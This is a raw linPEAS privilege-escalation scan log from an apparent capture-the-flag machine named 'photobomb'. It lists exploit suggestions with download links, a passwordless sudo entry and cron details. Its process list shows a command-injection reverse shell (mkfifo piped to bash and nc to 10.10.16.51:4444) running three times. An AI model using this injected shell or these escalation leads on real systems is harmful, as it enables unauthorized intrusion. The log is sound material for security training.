
          linpeas-ng by carlospolop

ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission.

Linux Privesc Checklist: https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist
 [1;4mLEGEND[0m:
  RED/YELLOW: 95% a PE vector
  RED: You should take a look to it
  LightCyan: Users with console
  Blue: Users without console & mounted devs
  Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs) 
  LightMagenta: Your username

 Starting linpeas. Caching Writable Folders...

                               ╔═══════════════════╗
═══════════════════════════════╣ Basic information ╠═══════════════════════════════
                               ╚═══════════════════╝
OS: Linux version 5.4.0-126-generic (buildd@lcy02-amd64-072) (gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.1)) #142-Ubuntu SMP Fri Aug 26 12:12:57 UTC 2022
User & Groups: uid=1000(wizard) gid=1000(wizard) groups=1000(wizard)
Hostname: photobomb
Writable folder: /dev/shm
[+] /usr/bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h)
[+] /usr/bin/bash is available for network discovery, port scanning and port forwarding (linpeas can discover hosts, scan ports, and forward ports. Learn more with -h)
[+] /usr/bin/nc is available for network discovery & port scanning (linpeas can discover hosts and scan ports, learn more with -h)



Caching directories DONE

                              ╔════════════════════╗
══════════════════════════════╣ System Information ╠══════════════════════════════
                              ╚════════════════════╝
╔══════════╣ Operative system
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits
Linux version 5.4.0-126-generic (buildd@lcy02-amd64-072) (gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.1)) #142-Ubuntu SMP Fri Aug 26 12:12:57 UTC 2022
Distributor ID:	Ubuntu
Description:	Ubuntu 20.04.5 LTS
Release:	20.04
Codename:	focal

╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version
Sudo version 1.8.31

╔══════════╣ CVEs Check
Vulnerable to CVE-2021-3560

Potentially Vulnerable to CVE-2022-2588



╔══════════╣ PATH
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-path-abuses
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
New path exported: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

╔══════════╣ Date & uptime
Tue 25 Oct 2022 08:00:26 PM UTC
 20:00:26 up 50 min,  0 users,  load average: 0.37, 0.18, 0.10

╔══════════╣ Any sd*/disk* disk in /dev? (limit 20)
disk
sda
sda1
sda2
sda3

╔══════════╣ Unmounted file-system?
╚ Check if you can mount umounted devices
/dev/disk/by-uuid/0be1d386-0af6-479c-98dc-9a59a4589303 / ext4 defaults 0 1
/dev/sda3	none	swap	sw	0	0

╔══════════╣ Environment
╚ Any private information inside environment variables?
LESSOPEN=| /usr/bin/lesspipe %s
HISTFILESIZE=0
USER=wizard
SHLVL=1
HOME=/home/wizard
OLDPWD=/home/wizard/photobomb
LOGNAME=wizard
JOURNAL_STREAM=9:32042
_=./linpeas.sh
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
INVOCATION_ID=7bf10dacb58449968725f55f7e69d1e7
LANG=en_US.UTF-8
HISTSIZE=0
LS_COLORS=
SHELL=/bin/bash
LESSCLOSE=/usr/bin/lesspipe %s %s
PWD=/tmp
HISTFILE=/dev/null

╔══════════╣ Searching Signature verification failed in dmesg
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#dmesg-signature-verification-failed
dmesg Not Found

╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2022-2586] nft_object UAF

   Details: https://www.openwall.com/lists/oss-security/2022/08/29/5
   Exposure: probable
   Tags: [ ubuntu=(20.04) ]{kernel:5.12.13}
   Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)

[+] [CVE-2021-4034] PwnKit

   Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
   Exposure: probable
   Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro
   Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main

[+] [CVE-2021-3156] sudo Baron Samedit

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: probable
   Tags: mint=19,[ ubuntu=18|20 ], debian=10
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main

[+] [CVE-2021-3156] sudo Baron Samedit 2

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: probable
   Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main

[+] [CVE-2021-22555] Netfilter heap out-of-bounds write

   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: probable
   Tags: [ ubuntu=20.04 ]{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded

[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)

   Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
   Exposure: less probable
   Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
   Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)

[+] [CVE-2017-5618] setuid screen v4.5.0 LPE

   Details: https://seclists.org/oss-sec/2017/q1/184
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154


╔══════════╣ Executing Linux Exploit Suggester 2
╚ https://github.com/jondonas/linux-exploit-suggester-2

╔══════════╣ Protections
═╣ AppArmor enabled? .............. You do not have enough privilege to read the profile set.
apparmor module is loaded.
═╣ grsecurity present? ............ grsecurity Not Found
═╣ PaX bins present? .............. PaX Not Found
═╣ Execshield enabled? ............ Execshield Not Found
═╣ SELinux enabled? ............... sestatus Not Found
═╣ Seccomp enabled? ............... disabled
═╣ AppArmor profile? .............. unconfined
═╣ User namespace? ................ enabled
═╣ Cgroup2 enabled? ............... enabled
═╣ Is ASLR enabled? ............... Yes
═╣ Printer? ....................... No
═╣ Is this a virtual machine? ..... Yes (vmware)

                                   ╔═══════════╗
═══════════════════════════════════╣ Container ╠═══════════════════════════════════
                                   ╚═══════════╝
╔══════════╣ Container related tools present
╔══════════╣ Am I Containered?
╔══════════╣ Container details
═╣ Is this a container? ........... No═╣ Any running containers? ........ No


                                     ╔═══════╗
═════════════════════════════════════╣ Cloud ╠═════════════════════════════════════
                                     ╚═══════╝
═╣ Google Cloud Platform? ............... No
═╣ AWS ECS? ............................. No
═╣ AWS EC2? ............................. No
═╣ AWS Lambda? .......................... No



                ╔════════════════════════════════════════════════╗
════════════════╣ Processes, Crons, Timers, Services and Sockets ╠════════════════
                ╚════════════════════════════════════════════════╝
╔══════════╣ Cleaned processes
╚ Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes
root           1  0.0  0.5 169768 11256 ?        Ss   19:09   0:02 /sbin/init maybe-ubiquity
root         463  0.0  0.5  68540 11192 ?        S<s  19:09   0:00 /lib/systemd/systemd-journald
root         498  0.0  0.3  22604  6120 ?        Ss   19:09   0:01 /lib/systemd/systemd-udevd
systemd+     503  0.0  0.3  19064  7576 ?        Ss   19:09   0:00 /lib/systemd/systemd-networkd
  └─(Caps) 0x0000000000003c00=cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw
root         623  0.0  0.8 214600 17948 ?        SLsl 19:09   0:00 /sbin/multipathd -d -s
systemd+     642  0.0  0.3  90876  6096 ?        Ssl  19:09   0:00 /lib/systemd/systemd-timesyncd
  └─(Caps) 0x0000000002000000=cap_sys_time
root         657  0.0  0.5  47540 10824 ?        Ss   19:09   0:00 /usr/bin/VGAuthService
root         671  0.1  0.4 237776  8216 ?        Ssl  19:09   0:03 /usr/bin/vmtoolsd
root         672  0.0  0.2  99896  5852 ?        Ssl  19:09   0:00 /sbin/dhclient -1 -4 -v -i -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -I -df /var/lib/dhcp/dhclient6.eth0.leases eth0
root         687  0.0  0.4 239296  9348 ?        Ssl  19:09   0:00 /usr/lib/accountsservice/accounts-daemon
message+     688  0.0  0.2   7592  4748 ?        Ss   19:09   0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  └─(Caps) 0x0000000020000000=cap_audit_write
root         698  0.0  0.1  81956  3596 ?        Ssl  19:09   0:00 /usr/sbin/irqbalance --foreground
root         699  0.0  0.9  29692 18532 ?        Ss   19:09   0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
wizard       700  0.0  0.0   2608   600 ?        Ss   19:09   0:00 /bin/sh /home/wizard/photobomb/photobomb.sh
wizard       729  0.0  1.9 361332 38228 ?        Sl   19:09   0:00  _ ruby server.rb
wizard      1260  0.0  0.0   2608   596 ?        S    19:41   0:00      _ sh -c convert source_images/. -resize 0x0 resized_images/._0x0.png;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.16.51 4444 >/tmp/f
wizard      1265  0.0  0.0   5620   584 ?        S    19:41   0:00      |   _ cat /tmp/f
wizard      1266  0.0  0.2   8180  5056 ?        S    19:41   0:00      |   _ /bin/bash -i
wizard      1267  0.0  0.1   3332  2072 ?        S    19:41   0:00      |   _ nc 10.10.16.51 4444
wizard     15557  0.0  0.0   2608   596 ?        S    19:49   0:00      _ sh -c convert source_images/. -resize 0x0 resized_images/._0x0.png;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.16.51 4444 >/tmp/f
wizard     15561  0.0  0.0   5620   516 ?        S    19:49   0:00      |   _ cat /tmp/f
wizard     15562  0.0  0.2   8312  5228 ?        S    19:49   0:00      |   _ /bin/bash -i
wizard     15563  0.0  0.1   3332  2020 ?        S    19:49   0:00      |   _ nc 10.10.16.51 4444
wizard     58477  0.0  0.0   2608   600 ?        S    20:00   0:00      _ sh -c convert source_images/. -resize 0x0 resized_images/._0x0.png;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.16.51 4444 >/tmp/f
wizard     58481  0.0  0.0   5620   512 ?        S    20:00   0:00          _ cat /tmp/f
wizard     58482  0.0  0.2   8180  4908 ?        S    20:00   0:00          _ /bin/bash -i
wizard     58490  0.2  0.1   3600  2640 ?        S    20:00   0:00          |   _ /bin/sh ./linpeas.sh -N -q
wizard     61538  0.0  0.0   3600  1084 ?        S    20:00   0:00          |       _ /bin/sh ./linpeas.sh -N -q
wizard     61541  0.0  0.1   9220  3708 ?        R    20:00   0:00          |       |   _ ps fauxwww
wizard     61542  0.0  0.0   3600  1084 ?        S    20:00   0:00          |       _ /bin/sh ./linpeas.sh -N -q
wizard     58483  0.0  0.1   3332  2032 ?        S    20:00   0:00          _ nc 10.10.16.51 4444
root         705  0.0  0.4 236312  8832 ?        Ssl  19:09   0:00 /usr/lib/policykit-1/polkitd --no-debug
syslog       709  0.0  0.2 224344  5108 ?        Ssl  19:09   0:00 /usr/sbin/rsyslogd -n -iNONE
root         714  0.0  0.2  17128  5900 ?        Ss   19:09   0:00 /lib/systemd/systemd-logind
root         715  0.0  0.6 395488 13748 ?        Ssl  19:09   0:00 /usr/lib/udisks2/udisksd
root         778  0.0  0.6 318820 13380 ?        Ssl  19:09   0:00 /usr/sbin/ModemManager
root         873  0.0  0.1   6816  2996 ?        Ss   19:10   0:00 /usr/sbin/cron -f
daemon       878  0.0  0.1   3796  2256 ?        Ss   19:10   0:00 /usr/sbin/atd -f
root         891  0.0  0.0  55276  1528 ?        Ss   19:10   0:00 nginx: master process /usr/sbin/nginx -g daemon on; master_process on;
www-data     893  0.0  0.3  55876  6200 ?        S    19:10   0:00  _ nginx: worker process
www-data     894  0.0  0.3  55876  6016 ?        S    19:10   0:00  _ nginx: worker process
root         892  0.0  0.0   5828  1788 tty1     Ss+  19:10   0:00 /sbin/agetty -o -p -- u --noclear tty1 linux
systemd+    1063  0.0  0.6  24568 12328 ?        Ss   19:15   0:00 /lib/systemd/systemd-resolved
wizard      8010  0.0  0.0  81196  1008 ?        Ss   19:43   0:00 gpg-agent --homedir /home/wizard/.gnupg --use-standard-socket --daemon

╔══════════╣ Binary processes permissions (non 'root root' and not belonging to current user)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes

╔══════════╣ Files opened by processes belonging to other users
╚ This is usually empty because of the lack of privileges to read other user processes information
COMMAND     PID   TID TASKCMD               USER   FD      TYPE             DEVICE SIZE/OFF   NODE NAME

╔══════════╣ Processes with credentials in memory (root req)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#credentials-from-process-memory
gdm-password Not Found
gnome-keyring-daemon Not Found
lightdm Not Found
vsftpd Not Found
apache2 Not Found
sshd: process found (dump creds from memory as root)

╔══════════╣ Cron jobs
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs
/usr/bin/crontab
# Edit this file to introduce tasks to be run by cron.
# 
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
# 
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').
# 
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
# 
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
# 
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
# 
# For more information see the manual pages of crontab(5) and cron(8)
# 
# m h  dom mon dow   command
*/5 * * * * sudo /opt/cleanup.sh
incrontab Not Found
-rw-r--r-- 1 root root    1042 Feb 13  2020 /etc/crontab

/etc/cron.d:
total 20
drwxr-xr-x   2 root root 4096 Sep 16 15:14 .
drwxr-xr-x 104 root root 4096 Oct  3 22:31 ..
-rw-r--r--   1 root root  201 Feb 14  2020 e2scrub_all
-rw-r--r--   1 root root  102 Feb 13  2020 .placeholder
-rw-r--r--   1 root root  191 Feb 23  2022 popularity-contest

/etc/cron.daily:
total 48
drwxr-xr-x   2 root root 4096 Sep 16 15:14 .
drwxr-xr-x 104 root root 4096 Oct  3 22:31 ..
-rwxr-xr-x   1 root root  376 Dec  4  2019 apport
-rwxr-xr-x   1 root root 1478 Apr  9  2020 apt-compat
-rwxr-xr-x   1 root root  355 Dec 29  2017 bsdmainutils
-rwxr-xr-x   1 root root 1187 Sep  5  2019 dpkg
-rwxr-xr-x   1 root root  377 Jan 21  2019 logrotate
-rwxr-xr-x   1 root root 1123 Feb 25  2020 man-db
-rw-r--r--   1 root root  102 Feb 13  2020 .placeholder
-rwxr-xr-x   1 root root 4574 Jul 18  2019 popularity-contest
-rwxr-xr-x   1 root root  214 May 14  2021 update-notifier-common

/etc/cron.hourly:
total 12
drwxr-xr-x   2 root root 4096 Sep 16 15:14 .
drwxr-xr-x 104 root root 4096 Oct  3 22:31 ..
-rw-r--r--   1 root root  102 Feb 13  2020 .placeholder

/etc/cron.monthly:
total 12
drwxr-xr-x   2 root root 4096 Sep 16 15:14 .
drwxr-xr-x 104 root root 4096 Oct  3 22:31 ..
-rw-r--r--   1 root root  102 Feb 13  2020 .placeholder

/etc/cron.weekly:
total 20
drwxr-xr-x   2 root root 4096 Sep 16 15:14 .
drwxr-xr-x 104 root root 4096 Oct  3 22:31 ..
-rwxr-xr-x   1 root root  813 Feb 25  2020 man-db
-rw-r--r--   1 root root  102 Feb 13  2020 .placeholder
-rwxr-xr-x   1 root root  403 Aug  5  2021 update-notifier-common

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
# Edit this file to introduce tasks to be run by cron.
# 
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
# 
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').
# 
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
# 
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
# 
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
# 
# For more information see the manual pages of crontab(5) and cron(8)
# 
# m h  dom mon dow   command
*/5 * * * * sudo /opt/cleanup.sh

╔══════════╣ Systemd PATH
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#systemd-path-relative-paths
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

╔══════════╣ Analyzing .service files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#services
/etc/systemd/system/multi-user.target.wants/atd.service is executing some relative path
/etc/systemd/system/multi-user.target.wants/grub-common.service is executing some relative path
/etc/systemd/system/sleep.target.wants/grub-common.service is executing some relative path
You can't write on systemd PATH

╔══════════╣ System timers
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers
NEXT                        LEFT          LAST                        PASSED               UNIT                         ACTIVATES                     
Tue 2022-10-25 21:48:14 UTC 1h 47min left Thu 2022-09-15 06:48:38 UTC 1 months 10 days ago fwupd-refresh.timer          fwupd-refresh.service         
Tue 2022-10-25 23:03:32 UTC 3h 2min left  Fri 2022-09-16 11:37:34 UTC 1 months 8 days ago  apt-daily.timer              apt-daily.service             
Wed 2022-10-26 00:00:00 UTC 3h 58min left Tue 2022-10-25 19:09:56 UTC 51min ago            logrotate.timer              logrotate.service             
Wed 2022-10-26 00:00:00 UTC 3h 58min left Tue 2022-10-25 19:09:56 UTC 51min ago            man-db.timer                 man-db.service                
Wed 2022-10-26 02:19:33 UTC 6h left       Tue 2022-10-25 19:21:09 UTC 39min ago            ua-timer.timer               ua-timer.service              
Wed 2022-10-26 03:59:35 UTC 7h left       Fri 2022-09-16 14:56:08 UTC 1 months 8 days ago  motd-news.timer              motd-news.service             
Wed 2022-10-26 06:25:12 UTC 10h left      Tue 2022-10-25 19:12:48 UTC 48min ago            apt-daily-upgrade.timer      apt-daily-upgrade.service     
Wed 2022-10-26 19:24:50 UTC 23h left      Tue 2022-10-25 19:24:50 UTC 36min ago            systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
Sun 2022-10-30 03:10:59 UTC 4 days left   Tue 2022-10-25 19:10:45 UTC 50min ago            e2scrub_all.timer            e2scrub_all.service           
Mon 2022-10-31 00:00:00 UTC 5 days left   Tue 2022-10-25 19:09:56 UTC 51min ago            fstrim.timer                 fstrim.service                

╔══════════╣ Analyzing .timer files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers

╔══════════╣ Analyzing .socket files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets
/etc/systemd/system/sockets.target.wants/uuidd.socket is calling this writable listener: /run/uuidd/request
/usr/lib/systemd/system/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/usr/lib/systemd/system/sockets.target.wants/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/usr/lib/systemd/system/sockets.target.wants/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/usr/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/usr/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
/usr/lib/systemd/system/syslog.socket is calling this writable listener: /run/systemd/journal/syslog
/usr/lib/systemd/system/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/usr/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/usr/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
/usr/lib/systemd/system/uuidd.socket is calling this writable listener: /run/uuidd/request

╔══════════╣ Unix Sockets Listening
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets
/home/wizard/.gnupg/S.gpg-agent
  └─(Read Write)
/home/wizard/.gnupg/S.gpg-agent.browser
  └─(Read Write)
/home/wizard/.gnupg/S.gpg-agent.extra
  └─(Read Write)
/home/wizard/.gnupg/S.gpg-agent.ssh
  └─(Read Write)
/org/kernel/linux/storage/multipathd
/run/dbus/system_bus_socket
  └─(Read Write)
/run/irqbalance//irqbalance698.sock
  └─(Read )
/run/irqbalance/irqbalance698.sock
  └─(Read )
/run/lvm/lvmpolld.socket
/run/systemd/fsck.progress
/run/systemd/journal/dev-log
  └─(Read Write)
/run/systemd/journal/io.systemd.journal
/run/systemd/journal/socket
  └─(Read Write)
/run/systemd/journal/stdout
  └─(Read Write)
/run/systemd/journal/syslog
  └─(Read Write)
/run/systemd/notify
  └─(Read Write)
/run/systemd/private
  └─(Read Write)
/run/systemd/userdb/io.systemd.DynamicUser
  └─(Read Write)
/run/udev/control
/run/uuidd/request
  └─(Read Write)
/run/vmware/guestServicePipe
  └─(Read Write)
/var/run/vmware/guestServicePipe
  └─(Read Write)

╔══════════╣ D-Bus config files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus
Possible weak user policy found on /etc/dbus-1/system.d/org.freedesktop.thermald.conf (        <policy group="power">)

╔══════════╣ D-Bus Service Objects list
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus
NAME                            PID PROCESS         USER             CONNECTION    UNIT                        SESSION DESCRIPTION
:1.0                            642 systemd-timesyn systemd-timesync :1.0          systemd-timesyncd.service   -       -
:1.1                            503 systemd-network systemd-network  :1.1          systemd-networkd.service    -       -
:1.11                          1063 systemd-resolve systemd-resolve  :1.11         systemd-resolved.service    -       -
:1.2                            687 accounts-daemon root             :1.2          accounts-daemon.service     -       -
:1.3                            705 polkitd         root             :1.3          polkit.service              -       -
:1.46                         64536 busctl          wizard           :1.46         photobomb.service           -       -
:1.5                            715 udisksd         root             :1.5          udisks2.service             -       -
:1.6                              1 systemd         root             :1.6          init.scope                  -       -
:1.7                            714 systemd-logind  root             :1.7          systemd-logind.service      -       -
:1.8                            699 networkd-dispat root             :1.8          networkd-dispatcher.service -       -
:1.9                            778 ModemManager    root             :1.9          ModemManager.service        -       -
com.ubuntu.LanguageSelector       - -               -                (activatable) -                           -       -
com.ubuntu.SoftwareProperties     - -               -                (activatable) -                           -       -
org.freedesktop.Accounts        687 accounts-daemon root             :1.2          accounts-daemon.service     -       -
org.freedesktop.DBus              1 systemd         root             -             init.scope                  -       -
org.freedesktop.ModemManager1   778 ModemManager    root             :1.9          ModemManager.service        -       -
org.freedesktop.PackageKit        - -               -                (activatable) -                           -       -
org.freedesktop.PolicyKit1      705 polkitd         root             :1.3          polkit.service              -       -
org.freedesktop.UDisks2         715 udisksd         root             :1.5          udisks2.service             -       -
org.freedesktop.UPower            - -               -                (activatable) -                           -       -
org.freedesktop.bolt              - -               -                (activatable) -                           -       -
org.freedesktop.fwupd             - -               -                (activatable) -                           -       -
org.freedesktop.hostname1         - -               -                (activatable) -                           -       -
org.freedesktop.locale1           - -               -                (activatable) -                           -       -
org.freedesktop.login1          714 systemd-logind  root             :1.7          systemd-logind.service      -       -
org.freedesktop.network1        503 systemd-network systemd-network  :1.1          systemd-networkd.service    -       -
org.freedesktop.resolve1       1063 systemd-resolve systemd-resolve  :1.11         systemd-resolved.service    -       -
org.freedesktop.systemd1          1 systemd         root             :1.6          init.scope                  -       -
org.freedesktop.thermald          - -               -                (activatable) -                           -       -
org.freedesktop.timedate1         - -               -                (activatable) -                           -       -
org.freedesktop.timesync1       642 systemd-timesyn systemd-timesync :1.0          systemd-timesyncd.service   -       -


                              ╔═════════════════════╗
══════════════════════════════╣ Network Information ╠══════════════════════════════
                              ╚═════════════════════╝
╔══════════╣ Hostname, hosts and DNS
photobomb
127.0.0.1 localhost
127.0.1.1 photobomb

::1     ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

nameserver 127.0.0.53
options edns0 trust-ad

╔══════════╣ Interfaces
# symbolic names for networks, see networks(5) for more information
link-local 169.254.0.0
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.11.182  netmask 255.255.254.0  broadcast 10.10.11.255
        inet6 dead:beef::250:56ff:feb9:2da1  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::250:56ff:feb9:2da1  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:b9:2d:a1  txqueuelen 1000  (Ethernet)
        RX packets 10443  bytes 1990857 (1.9 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 9948  bytes 1885921 (1.8 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 4193  bytes 333804 (333.8 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 4193  bytes 333804 (333.8 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0


╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:4567          0.0.0.0:*               LISTEN      729/ruby            
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   

╔══════════╣ Can I sniff with tcpdump?
No



                               ╔═══════════════════╗
═══════════════════════════════╣ Users Information ╠═══════════════════════════════
                               ╚═══════════════════╝
╔══════════╣ My user
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#users
uid=1000(wizard) gid=1000(wizard) groups=1000(wizard)

╔══════════╣ Do I have PGP keys?
/usr/bin/gpg
netpgpkeys Not Found
netpgp Not Found

╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
Matching Defaults entries for wizard on photobomb:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User wizard may run the following commands on photobomb:
    (root) SETENV: NOPASSWD: /opt/cleanup.sh

╔══════════╣ Checking sudo tokens
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens
ptrace protection is enabled (1)
gdb wasn't found in PATH, this might still be vulnerable but linpeas won't be able to check it

╔══════════╣ Checking Pkexec policy
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe#pe-method-2

[Configuration]
AdminIdentities=unix-user:0
[Configuration]
AdminIdentities=unix-group:sudo;unix-group:admin

╔══════════╣ Superusers
root:x:0:0:root:/root:/bin/bash

╔══════════╣ Users with console
root:x:0:0:root:/root:/bin/bash
wizard:x:1000:1000:wizard:/home/wizard:/bin/bash

╔══════════╣ All users & groups
uid=0(root) gid=0(root) groups=0(root)
uid=1000(wizard) gid=1000(wizard) groups=1000(wizard)
uid=100(systemd-network) gid=102(systemd-network) groups=102(systemd-network)
uid=101(systemd-resolve) gid=103(systemd-resolve) groups=103(systemd-resolve)
uid=102(systemd-timesync) gid=104(systemd-timesync) groups=104(systemd-timesync)
uid=103(messagebus) gid=106(messagebus) groups=106(messagebus)
uid=104(syslog) gid=110(syslog) groups=110(syslog),4(adm),5(tty)
uid=105(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=106(tss) gid=111(tss) groups=111(tss)
uid=107(uuidd) gid=112(uuidd) groups=112(uuidd)
uid=108(tcpdump) gid=113(tcpdump) groups=113(tcpdump)
uid=109(landscape) gid=115(landscape) groups=115(landscape)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=110(pollinate) gid=1(daemon) groups=1(daemon)
uid=111(usbmux) gid=46(plugdev) groups=46(plugdev)
uid=112(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
